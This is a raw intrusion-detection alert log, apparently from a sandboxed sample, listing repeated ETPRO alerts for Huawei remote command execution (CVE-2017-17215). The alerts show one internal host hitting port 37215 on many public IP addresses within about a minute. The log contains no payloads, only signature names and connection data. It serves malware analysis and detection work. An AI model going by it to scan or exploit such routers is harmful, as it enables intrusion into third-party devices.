                                                        06/13/24-21:32:30.075094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5896837215192.168.2.14197.106.251.218
                                                        06/13/24-21:32:30.078314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773037215192.168.2.1441.52.102.118
                                                        06/13/24-21:32:25.975464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665437215192.168.2.1441.213.225.174
                                                        06/13/24-21:32:23.832965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940837215192.168.2.14156.103.62.207
                                                        06/13/24-21:32:48.550596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359437215192.168.2.14197.191.60.55
                                                        06/13/24-21:33:11.180623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019637215192.168.2.1441.216.241.6
                                                        06/13/24-21:32:30.094210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042437215192.168.2.14156.162.114.182
                                                        06/13/24-21:32:34.214315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692437215192.168.2.14197.39.66.195
                                                        06/13/24-21:33:04.988144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595437215192.168.2.14197.0.128.7
                                                        06/13/24-21:32:07.402430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563237215192.168.2.14156.91.26.206
                                                        06/13/24-21:32:50.631305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792837215192.168.2.14156.129.103.165
                                                        06/13/24-21:32:52.670020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800237215192.168.2.14156.162.115.41
                                                        06/13/24-21:33:02.937115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945037215192.168.2.1441.58.168.171
                                                        06/13/24-21:32:52.670384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866237215192.168.2.1441.60.220.2
                                                        06/13/24-21:32:13.544283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344237215192.168.2.14156.243.55.121
                                                        06/13/24-21:32:34.199691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235637215192.168.2.14156.236.164.19
                                                        06/13/24-21:32:25.976222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152037215192.168.2.14156.5.101.40
                                                        06/13/24-21:33:13.211412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729637215192.168.2.14156.40.201.195
                                                        06/13/24-21:32:05.378345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894437215192.168.2.14156.149.109.38
                                                        06/13/24-21:32:11.509270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382637215192.168.2.14156.232.36.111
                                                        06/13/24-21:33:15.253478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009637215192.168.2.1441.244.106.104
                                                        06/13/24-21:32:40.376302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902037215192.168.2.14197.231.21.167
                                                        06/13/24-21:32:05.349067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193637215192.168.2.1441.55.197.133
                                                        06/13/24-21:32:17.697123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170837215192.168.2.14156.110.127.7
                                                        06/13/24-21:32:09.456159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446837215192.168.2.14156.51.117.19
                                                        06/13/24-21:31:57.134278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362037215192.168.2.1441.98.18.98
                                                        06/13/24-21:32:13.564310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637837215192.168.2.14197.118.93.47
                                                        06/13/24-21:32:21.786406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677437215192.168.2.14156.37.116.193
                                                        06/13/24-21:32:28.046243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865837215192.168.2.14197.132.171.147
                                                        06/13/24-21:32:36.243338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050837215192.168.2.14197.115.179.22
                                                        06/13/24-21:32:05.344168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287437215192.168.2.14197.248.150.230
                                                        06/13/24-21:32:13.547274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447437215192.168.2.14156.203.81.155
                                                        06/13/24-21:32:40.372727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160437215192.168.2.1441.217.186.245
                                                        06/13/24-21:32:48.572563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152637215192.168.2.14156.196.57.53
                                                        06/13/24-21:32:32.168261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721437215192.168.2.1441.46.235.168
                                                        06/13/24-21:32:44.456516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.1441.103.187.188
                                                        06/13/24-21:32:01.223016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921837215192.168.2.14156.80.77.144
                                                        06/13/24-21:33:07.054817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520837215192.168.2.14156.104.118.175
                                                        06/13/24-21:32:42.422400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663837215192.168.2.1441.127.53.37
                                                        06/13/24-21:32:28.044732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051037215192.168.2.14156.133.103.180
                                                        06/13/24-21:33:02.914209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597237215192.168.2.14197.33.96.217
                                                        06/13/24-21:32:23.941797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700237215192.168.2.14156.156.163.8
                                                        06/13/24-21:32:42.405292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521837215192.168.2.1441.26.117.65
                                                        06/13/24-21:32:30.100246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204437215192.168.2.14197.162.107.78
                                                        06/13/24-21:32:05.346959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860037215192.168.2.14156.217.87.42
                                                        06/13/24-21:32:34.216642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821237215192.168.2.1441.87.113.29
                                                        06/13/24-21:32:52.676106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963037215192.168.2.1441.48.19.9
                                                        06/13/24-21:33:13.230074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485237215192.168.2.14197.31.111.97
                                                        06/13/24-21:33:11.157809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013237215192.168.2.14197.224.105.238
                                                        06/13/24-21:32:30.127352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457037215192.168.2.1441.19.54.46
                                                        06/13/24-21:32:48.567257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615637215192.168.2.14197.104.219.56
                                                        06/13/24-21:33:15.254628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464037215192.168.2.1441.177.26.204
                                                        06/13/24-21:32:25.991870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088837215192.168.2.1441.108.222.74
                                                        06/13/24-21:33:04.988866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170837215192.168.2.14197.24.77.221
                                                        06/13/24-21:32:52.669525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049037215192.168.2.1441.124.22.194
                                                        06/13/24-21:32:52.678212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087237215192.168.2.14156.162.80.150
                                                        06/13/24-21:33:02.914780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089437215192.168.2.1441.193.242.106
                                                        06/13/24-21:33:05.017278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801437215192.168.2.1441.46.114.141
                                                        06/13/24-21:32:30.077483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4365237215192.168.2.14197.130.187.166
                                                        06/13/24-21:32:05.347124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056237215192.168.2.14156.110.220.38
                                                        06/13/24-21:32:21.780350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990037215192.168.2.14197.32.167.227
                                                        06/13/24-21:32:17.696834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710837215192.168.2.14197.87.130.132
                                                        06/13/24-21:32:11.487708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409237215192.168.2.14156.112.189.27
                                                        06/13/24-21:33:05.012259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695037215192.168.2.14197.17.211.61
                                                        06/13/24-21:32:32.165840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766437215192.168.2.1441.214.184.230
                                                        06/13/24-21:32:56.758191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479637215192.168.2.14197.185.50.86
                                                        06/13/24-21:32:50.614353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731637215192.168.2.1441.237.219.207
                                                        06/13/24-21:32:19.729942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402637215192.168.2.1441.242.186.42
                                                        06/13/24-21:32:19.728689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937437215192.168.2.14156.42.12.110
                                                        06/13/24-21:31:57.133999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299837215192.168.2.1441.32.134.206
                                                        06/13/24-21:32:11.485195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619237215192.168.2.14156.107.25.200
                                                        06/13/24-21:32:34.215381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172437215192.168.2.14156.38.129.51
                                                        06/13/24-21:33:11.175941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738637215192.168.2.14156.24.60.198
                                                        06/13/24-21:31:57.129929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665237215192.168.2.14197.92.27.0
                                                        06/13/24-21:32:11.486665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077637215192.168.2.14197.32.57.158
                                                        06/13/24-21:32:09.440022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.14156.20.93.120
                                                        06/13/24-21:32:44.456472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354437215192.168.2.1441.161.88.127
                                                        06/13/24-21:33:07.042127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609037215192.168.2.14197.241.160.64
                                                        06/13/24-21:33:09.109021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854237215192.168.2.14156.233.78.178
                                                        06/13/24-21:32:48.568397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388237215192.168.2.14197.77.19.238
                                                        06/13/24-21:32:36.262514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080637215192.168.2.14156.255.93.84
                                                        06/13/24-21:33:02.913203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576637215192.168.2.14156.171.111.23
                                                        06/13/24-21:32:46.502554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014437215192.168.2.1441.12.176.241
                                                        06/13/24-21:32:54.726549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580837215192.168.2.1441.78.106.180
                                                        06/13/24-21:33:09.110394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775437215192.168.2.14197.140.90.27
                                                        06/13/24-21:32:48.552860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338437215192.168.2.14197.235.242.152
                                                        06/13/24-21:32:52.656041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128637215192.168.2.1441.188.148.162
                                                        06/13/24-21:33:09.088237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074237215192.168.2.14197.170.199.65
                                                        06/13/24-21:32:38.304274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306837215192.168.2.14156.105.100.210
                                                        06/13/24-21:32:46.503782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910437215192.168.2.1441.26.121.119
                                                        06/13/24-21:31:59.194693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938037215192.168.2.1441.72.198.137
                                                        06/13/24-21:32:05.347320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369437215192.168.2.1441.45.34.20
                                                        06/13/24-21:32:46.502966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793637215192.168.2.1441.246.32.134
                                                        06/13/24-21:32:48.555014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629437215192.168.2.1441.70.231.23
                                                        06/13/24-21:32:46.503138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960037215192.168.2.14156.61.187.93
                                                        06/13/24-21:33:15.256332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593437215192.168.2.14156.107.22.103
                                                        06/13/24-21:32:15.632568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738037215192.168.2.1441.171.53.13
                                                        06/13/24-21:32:15.611385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194037215192.168.2.14197.167.10.7
                                                        06/13/24-21:32:09.438463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450637215192.168.2.1441.229.63.146
                                                        06/13/24-21:32:28.027984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349237215192.168.2.14197.228.51.188
                                                        06/13/24-21:32:38.321122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271037215192.168.2.1441.108.44.2
                                                        06/13/24-21:32:52.654420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687037215192.168.2.14197.154.95.207
                                                        06/13/24-21:32:07.404294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326437215192.168.2.1441.241.52.3
                                                        06/13/24-21:32:48.550267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761837215192.168.2.14156.141.186.64
                                                        06/13/24-21:32:54.725272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440637215192.168.2.14156.212.153.32
                                                        06/13/24-21:32:03.308572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585037215192.168.2.14156.183.231.156
                                                        06/13/24-21:32:38.316572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940837215192.168.2.14197.147.215.140
                                                        06/13/24-21:32:07.419762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570637215192.168.2.1441.167.199.232
                                                        06/13/24-21:33:17.303933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241237215192.168.2.14156.127.52.63
                                                        06/13/24-21:32:30.123734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203437215192.168.2.14197.137.52.62
                                                        06/13/24-21:32:38.322893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5807637215192.168.2.1441.131.137.21
                                                        06/13/24-21:32:07.417514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612637215192.168.2.14156.176.211.237
                                                        06/13/24-21:32:54.710017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292237215192.168.2.1441.202.180.92
                                                        06/13/24-21:33:04.992609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573437215192.168.2.1441.127.235.147
                                                        06/13/24-21:32:34.214629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191437215192.168.2.14197.227.42.33
                                                        06/13/24-21:33:09.085629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857037215192.168.2.14156.21.47.82
                                                        06/13/24-21:32:03.298625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951037215192.168.2.1441.78.129.83
                                                        06/13/24-21:31:59.175345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734237215192.168.2.14156.43.161.30
                                                        06/13/24-21:32:48.568305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4534037215192.168.2.14197.108.252.238
                                                        06/13/24-21:33:02.913733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211237215192.168.2.1441.242.113.202
                                                        06/13/24-21:32:21.780972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140837215192.168.2.1441.49.13.227
                                                        06/13/24-21:32:44.474109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505637215192.168.2.14156.237.148.78
                                                        06/13/24-21:32:52.656650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4606837215192.168.2.14156.179.189.5
                                                        06/13/24-21:32:21.781365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911837215192.168.2.1441.79.27.30
                                                        06/13/24-21:32:01.240861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553837215192.168.2.14156.189.17.67
                                                        06/13/24-21:32:38.302329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884037215192.168.2.1441.110.38.1
                                                        06/13/24-21:32:21.801073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136437215192.168.2.1441.60.48.38
                                                        06/13/24-21:32:38.317942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923237215192.168.2.14197.23.63.63
                                                        06/13/24-21:32:28.027868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.1441.109.88.168
                                                        06/13/24-21:32:23.835632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317037215192.168.2.14197.182.103.11
                                                        06/13/24-21:32:52.669770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803237215192.168.2.14156.48.215.97
                                                        06/13/24-21:32:15.604475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890237215192.168.2.14197.212.93.206
                                                        06/13/24-21:33:05.016757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856237215192.168.2.14197.67.229.20
                                                        06/13/24-21:32:15.629376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956037215192.168.2.1441.48.237.65
                                                        06/13/24-21:32:56.786905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724037215192.168.2.1441.199.253.1
                                                        06/13/24-21:33:07.042441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335037215192.168.2.14197.99.44.142
                                                        06/13/24-21:33:04.992127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898837215192.168.2.14197.155.66.13
                                                        06/13/24-21:33:09.110789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038437215192.168.2.1441.241.209.175
                                                        06/13/24-21:32:28.028521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325237215192.168.2.1441.107.113.203
                                                        06/13/24-21:32:05.369682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295637215192.168.2.1441.223.5.92
                                                        06/13/24-21:32:15.608507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264037215192.168.2.14156.22.231.210
                                                        06/13/24-21:32:42.421006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4767637215192.168.2.14156.97.251.252
                                                        06/13/24-21:32:44.458353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330637215192.168.2.14197.7.65.69
                                                        06/13/24-21:32:38.315847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002037215192.168.2.14197.204.179.199
                                                        06/13/24-21:31:59.175407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4394037215192.168.2.14156.139.143.212
                                                        06/13/24-21:32:21.785654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600437215192.168.2.1441.127.241.106
                                                        06/13/24-21:32:40.380493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363037215192.168.2.14197.130.90.216
                                                        06/13/24-21:32:13.547016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346637215192.168.2.14156.2.99.61
                                                        06/13/24-21:32:25.976307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943237215192.168.2.14197.84.102.163
                                                        06/13/24-21:32:17.694854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837237215192.168.2.14197.106.7.67
                                                        06/13/24-21:32:36.242462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410837215192.168.2.14197.136.10.26
                                                        06/13/24-21:31:59.200246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987037215192.168.2.1441.17.85.190
                                                        06/13/24-21:32:54.724545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817037215192.168.2.14156.66.170.98
                                                        06/13/24-21:32:42.424210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694237215192.168.2.14197.97.74.14
                                                        06/13/24-21:32:01.219607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062837215192.168.2.1441.216.57.211
                                                        06/13/24-21:32:09.457777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070837215192.168.2.14197.255.4.189
                                                        06/13/24-21:32:52.658647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805437215192.168.2.14197.78.114.151
                                                        06/13/24-21:33:09.110658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754437215192.168.2.14156.51.91.19
                                                        06/13/24-21:32:48.554063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136637215192.168.2.1441.117.3.231
                                                        06/13/24-21:33:13.213693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439437215192.168.2.14156.128.54.41
                                                        06/13/24-21:32:01.220987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853037215192.168.2.1441.236.151.82
                                                        06/13/24-21:31:59.200056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077437215192.168.2.14156.14.18.99
                                                        06/13/24-21:32:38.316903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.14156.62.154.72
                                                        06/13/24-21:32:25.993068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3328637215192.168.2.14156.168.196.198
                                                        06/13/24-21:32:40.373957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326837215192.168.2.1441.37.122.23
                                                        06/13/24-21:32:38.302897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832037215192.168.2.14197.155.214.139
                                                        06/13/24-21:32:36.241743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719637215192.168.2.14156.252.221.118
                                                        06/13/24-21:32:36.245799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210637215192.168.2.1441.211.211.41
                                                        06/13/24-21:33:04.990465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518637215192.168.2.1441.5.42.34
                                                        06/13/24-21:33:09.090062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819437215192.168.2.14197.193.138.181
                                                        06/13/24-21:33:13.228725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348837215192.168.2.1441.172.181.90
                                                        06/13/24-21:32:23.936823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5005837215192.168.2.1441.93.89.148
                                                        06/13/24-21:32:52.672187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074037215192.168.2.1441.12.242.144
                                                        06/13/24-21:32:58.822024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849637215192.168.2.14156.176.135.162
                                                        06/13/24-21:32:19.729387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035037215192.168.2.14156.155.170.33
                                                        06/13/24-21:33:09.111578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564437215192.168.2.14156.159.6.150
                                                        06/13/24-21:32:50.613828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800237215192.168.2.14156.46.29.23
                                                        06/13/24-21:31:59.176315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938237215192.168.2.14197.254.81.101
                                                        06/13/24-21:32:30.100577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035237215192.168.2.1441.42.21.187
                                                        06/13/24-21:32:07.401671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504637215192.168.2.14156.159.236.204
                                                        06/13/24-21:32:30.127314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746837215192.168.2.1441.230.79.156
                                                        06/13/24-21:32:52.670616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227637215192.168.2.14197.45.210.254
                                                        06/13/24-21:32:05.348981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836037215192.168.2.1441.201.18.44
                                                        06/13/24-21:32:07.402899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220037215192.168.2.14156.55.220.119
                                                        06/13/24-21:32:36.267309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547437215192.168.2.14156.112.101.208
